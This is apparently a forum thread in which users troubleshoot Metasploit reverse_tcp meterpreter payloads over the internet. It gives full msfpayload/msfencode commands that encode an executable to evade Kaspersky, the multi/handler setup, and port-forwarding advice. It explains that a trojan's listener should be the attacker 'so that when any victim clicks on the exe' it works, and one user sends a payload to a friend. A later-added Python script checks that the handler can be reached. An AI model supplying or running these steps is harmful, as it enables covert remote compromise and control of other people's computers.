Try setting your LHOST to your internal IP if you have done the port forwarding.
I am trying to create a test situation where I exploit someone via the internet. To do so, I have two computers (one victim and one attacker) on two different connections, and I generate a simple meterpreter.exe + handler on my BackTrack box, and the Windows victim will stupidly double-click on my .exe.
It's really just for trying purposes, and it doesn't even work.
So this is what I do:
1. On my BackTrack box (192.168.1.2 // 220.127.116.11) I generate the meterpreter and encode it to bypass Kaspersky:
Code:
./msfpayload windows/meterpreter/reverse_tcp LHOST=18.104.22.168 LPORT=8080 R | ./msfencode -e php/base64 -c 6 -t raw | ./msfencode -e x86/shikata_ga_nai -c 20 -t exe > /root/binaries/final.exe
2. Then, still on my BackTrack box, I open the handler to receive the reverse connection from the victim when he double-clicks it:
Code:
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 22.214.171.124
msf> set LPORT 8080
msf> exploit
[-] Handler failed to bind to 126.96.36.199:8080
// I guess this isn't really an issue since it just "listens" for the victim's connection, so the local IP should be fine... right?
[*] Started reverse handler on 0.0.0.0:8080
[*] Starting the payload handler...
3. Everything seems OK to me so far. Now I'm going to get the .exe and run it on my box.
And it's here that everything seems to fail. I don't know why. I tried without antivirus, my NAT is correct, my port forwarding is set up and ready to forward...
I just double-click on the exe, a window pops up for one second and then nothing. The handler doesn't move and the meterpreter doesn't seem to work.
The windows box (victim) is a Windows 7 machine.
Am I missing something? Did I do something wrong?
Last edited by 0megear; 07-07-2010 at 07:47 PM.
I don't know what I'm doing wrong, but it is not working.
My victim computer is a Windows 7 (build 7600, unlicensed) without firewall or antivirus. The meterpreter is double-clicked, a cmd.exe shows... and then nothing. No handler activity when I take a look at my BackTrack computer. I tried without encoding and it still doesn't work.
What is strange about it is that it seems to give random results. During my test, the meterpreter.exe on the victim was popping up for one second then disappearing, and when I generated the exact same meterpreter 15 minutes later, the cmd.exe just stayed open without disappearing.
I must be doing something wrong, but I double-checked everything and I just don't get it.
Digging up old topics, I know, but I am posting this just in case someone has encountered the same error and needs help.
The LHOST should be your backtrack box IP, not the victim IP.
It should start with 172.x.x.x or 192.168.x.x.
After you enter exploit, the victim has to click on the exe file you created to be exploited.
For your understanding, the LHOST (aka Listening Host) should be YOU, or a server you are connected to that is listening for ANY connection from the victim. RHOST (aka Remote Host) will be the victim's IP. Therefore in any TROJAN you create, you should always set the LISTENING HOST to YOU, so that when any victim clicks on the exe while you are listening, the trojan will work.
I would look for the stager (the payload you generated) exe in Windows Task Manager to see if it is running or just opens then closes. Or perhaps try using netstat in Windows to observe outbound TCP/IP connections. To test if the port forwarding is set up correctly for the handler, you can browse to 188.8.131.52:8080 from the Windows box and watch if the handler responds in any way.
I have a problem with Metasploit outside the LAN...
1- forward port 4444 on my router,
2- disable the firewall on my PC
3- create the payload windows/meterpreter/reverse_tcp with LHOST = (my no-ip address), LPORT = 4444
4- use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (my internal IP)
set LPORT 4444
5- send the payload, my friend opens it and nothing happens...
What's the problem? Within the LAN it works...
Many ISPs block port 4444. We do (I work for one). Try it on another port.
Running both KDE and GNOME BT5 flawlessly. Thank you!
Last edited by iproute; 03-29-2011 at 11:05 PM.
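The two checks suggested in the replies above (probe the handler port from the victim box to confirm the port forward actually lands on the handler, and try a port other than 4444 if the ISP filters it) can be scripted. What follows is an added example written for this thread, not code from the original posts or from Metasploit. The listener stands in for multi/handler bound on 0.0.0.0 (the address it falls back to when LHOST is not a local interface), the probe makes the same TCP connect the stager would make to the LHOST:LPORT baked into the exe, and every address and port in it is a placeholder. Run the listener on the attacker box and the probe from the victim box against the public (forwarded) address.

```python
"""Reachability check for a reverse-TCP handler (added example, not from the thread).

Attacker side: start_listener() binds 0.0.0.0:LPORT and records every peer that
connects.  Victim side: probe() / first_reachable() attempt the connect the
stager would make.  Comparing the two answers the question in the thread:
did the exe never connect, or did it connect and the handler was not there?
Addresses and ports below are placeholders.
"""
import socket
import threading


def start_listener(port=0, bind_addr="0.0.0.0"):
    """Bind on all interfaces and accept in a background thread.

    Returns (server_socket, bound_port, peers).  port=0 lets the OS choose a
    free port (handy for testing); peers collects (ip, port) of every client
    that got through, which is the handler-side proof the forward works.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, port))
    srv.listen(5)
    peers = []

    def accept_loop():
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:          # listener shut down: stop accepting
                return
            peers.append(peer)
            conn.close()             # we only care that the connect arrived

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1], peers


def stop_listener(srv):
    """Wake the accept thread (shutdown on a listening socket) and release the port."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


def probe(host, port, timeout=3.0):
    """True if a TCP connect to host:port completes within timeout.

    Refused  -> packet reached a host with nothing listening (wrong LHOST,
                handler not started, forward pointed at the wrong inside IP).
    Timeout  -> usually a firewall or ISP filter dropped it (the 4444 case).
    After connecting we read once so the listener has logged the peer before
    we return; a timeout on that read still counts as connected.
    """
    try:
        s = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return False
    try:
        s.recv(1)
    except OSError:
        pass
    finally:
        s.close()
    return True


def first_reachable(host, ports, timeout=3.0):
    """Return the first port in `ports` that answers, or None.

    Bind listeners on several candidate ports on the attacker side, then run
    this from the victim side to learn which one the path actually allows.
    """
    for p in ports:
        if probe(host, p, timeout):
            return p
    return None


def closed_port():
    """A loopback port with nothing listening (bind, note it, release), for negative checks."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    p = tmp.getsockname()[1]
    tmp.close()
    return p


if __name__ == "__main__":
    # Local demonstration with listener and probe on the same machine.
    srv, port, peers = start_listener()
    print("handler listening on 0.0.0.0:%d" % port)
    print("probe 127.0.0.1:%d ->" % port, probe("127.0.0.1", port), "peers:", peers)
    print("probe a closed port ->", probe("127.0.0.1", closed_port(), timeout=1.0))
    stop_listener(srv)
```

In the thread's setup the listener's bound port must match the LPORT in the exe and the router's forward, while the probe is run against the public address the exe carries as LHOST; a refused or timed-out probe from the victim box tells you the forward or the port is the problem before you blame the encoder.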